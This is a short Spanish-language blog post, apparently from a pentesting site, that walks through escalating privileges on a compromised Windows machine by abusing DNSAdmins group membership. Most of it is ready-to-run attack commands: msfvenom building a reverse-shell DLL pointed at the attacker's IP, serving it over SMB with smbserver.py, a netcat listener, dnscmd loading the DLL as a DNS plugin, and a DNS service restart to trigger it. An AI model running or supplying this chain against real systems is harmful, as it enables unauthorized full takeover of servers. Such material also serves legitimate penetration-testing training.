Cuando tomamos el control de una máquina, el siguiente paso es la escalada de privilegios para hacernos con el control total de ella. En la siguiente entrada, veremos como conseguirlo aprovechándonos del grupo de administradores DNS y la inyección de una dll maliciosa.
Pasos a seguir
- Comprobar que el usuario comprometido forma parte del grupo de administradores DNS.
whoami /all

- Generar un payload con una shell reversa mediante el uso de msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-ATACANTE] LPORT=[PUERTO-ATACANTE] --platform=windows -f dll > ~/payloads/plugin.dll

- Desde la máquina atacante, servir el payload generado en el paso anterior por SAMBA mediante el script smbserver.py.
cd /usr/share/doc/python3-impacket/examples
sudo ./smbserver.py HACKPUNTES /home/jolmedo/payloads/

- En otra terminal, ponemos la máquina atacante a la escucha en el puerto 4444 con netcat.
nc -lvnp 4444
- En la máquina comprometida, importamos la dll maliciosa de la siguiente manera.
dnscmd.exe /config /serverlevelplugindll \\[IP-ATACANTE]\hackpuntes\plugin.dll

- Ultimo paso para conseguir la shell reversa con privilegios, reiniciar el servicio DNS.
sc.exe stop dns
sc.exe start dns

Hasta la próxima!!